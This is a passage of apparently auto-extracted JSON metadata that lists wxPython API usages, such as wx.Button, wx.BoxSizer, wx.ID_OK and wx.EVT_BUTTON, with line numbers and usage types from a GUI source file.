"call"}, {"api_name": "wx.HORIZONTAL", "line_number": 3473, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 3474, "usage_type": "call"}, {"api_name": "wx.ID_OK", "line_number": 3474, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 3475, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 3477, "usage_type": "call"}, {"api_name": "wx.ID_CANCEL", "line_number": 3477, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 3478, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 3491, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 3491, "usage_type": "attribute"}, {"api_name": "wx.ID_CANCEL", "line_number": 3500, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 3545, "usage_type": "attribute"}]}